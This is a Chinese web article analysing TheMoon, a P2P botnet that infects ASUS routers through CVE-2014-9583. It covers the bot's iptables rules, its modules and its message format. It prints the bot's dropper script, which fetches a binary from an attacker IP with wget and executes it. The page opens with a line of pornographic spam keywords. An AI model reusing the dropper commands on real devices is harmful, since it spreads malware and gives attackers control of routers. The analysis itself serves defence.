欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

詳解感染華碩路由器的P2P僵尸網(wǎng)絡(luò)程序

  發(fā)布時間:2016-10-28 15:01:03   作者:佚名   我要評論
很多電腦用戶對于華碩路由器感染僵尸網(wǎng)絡(luò)很迷茫,下面小編主要針對這個問題為大家講解感染華碩路由器的P2P僵尸網(wǎng)絡(luò)程序TheMoon,希望可以幫助到大家

僵尸網(wǎng)絡(luò)是指采用一種或多種傳播手段,是指實現(xiàn)惡意控制功能的程序代碼,在控制者和被感染主機之間所形成的一個可一對多控制的網(wǎng)絡(luò)。

\

下圖是利用wireshark抓包捕獲的僵尸程序攻擊流量,可看出僵尸程序使用了CVE-2014-9583漏洞利用代碼。

\

CVE-2014-9583 :ASUS WRT是華碩(ASUS)公司的一個路由器固件。RT-AC66U、RT-N66U等多款路由器中使用的ASUS WRT的infosvr中的common.c文件中存在安全漏洞,該漏洞源于程序沒有正確檢查請求的MAC地址。遠程攻擊者可通過向UDP 9999端口發(fā)送NET_CMD_ID_MANU_CMD數(shù)據(jù)包利用該漏洞繞過身份驗證,執(zhí)行任意命令。詳情參見GitHub

以下是bot從網(wǎng)站http://78.128.92.137:80/ 自動下載的nmlt1.sh文件內(nèi)容

#!/bin/sh

cd /tmp

rm -f .nttpd

wget -O .nttpd http://78.128.92.137/.nttpd,17-mips-le-t1

chmod +x .nttpd

./.nttpd

路由器將會從攻擊者控制的網(wǎng)站上自動下載并執(zhí)行.nttpd文件,.nttpd運行后將成為駐留進程。以下為.nttpd文件哈希信息

\

該bot程序?qū)儆赥heMoon惡意軟件系列,程序結(jié)構(gòu)如下:

\

該bot程序主要不同在于os_init和 run_modules函數(shù),os_init中插入了8個iptables規(guī)則:

\

為了獲得感染設(shè)備的絕對控制權(quán),防止反復(fù)感染,其中第一條規(guī)則通過關(guān)閉端口9999,阻止其它攻擊者利用華碩CVE-2014-9583漏洞;第二條規(guī)則是關(guān)閉多個端口,阻止其它攻擊者利用D-Link的一個遠程命令執(zhí)行漏洞。其余為bot程序建立的網(wǎng)絡(luò)通信規(guī)則。

在run_modules中,bot加載了3個模塊:CLK 、NET、DWL,我們依次來做分析:

CLK模塊

該模塊加載了兩個線程,一個用來計時,一個用來同步,它通過查詢公開NTP服務(wù)器保持UTC時間。抓包發(fā)現(xiàn)bot與NTP服務(wù)器之間的請求回應(yīng)流量

\

Net模塊

該模塊開啟了UDP 5143端口,并創(chuàng)建了一個P2P通信線程。值得注意的是,與通常的端口通信不同,該bot程序支持3種不特定的消息類型。

Register message

RegisterTo message

FetchCommand message

每種類型都包含相同的頭結(jié)構(gòu):

Offset Size Description

0 1 Body length

1 1 Message Type

2 1 TTL

3 1 0x8F (variant specific)

當(dāng)bot接收到消息時,TTL值以1遞減,并把消息轉(zhuǎn)發(fā)給其它對等結(jié)點(peer),下圖為向其它peer節(jié)點轉(zhuǎn)發(fā)消息的底層代碼

\

相關(guān)文章

最新評論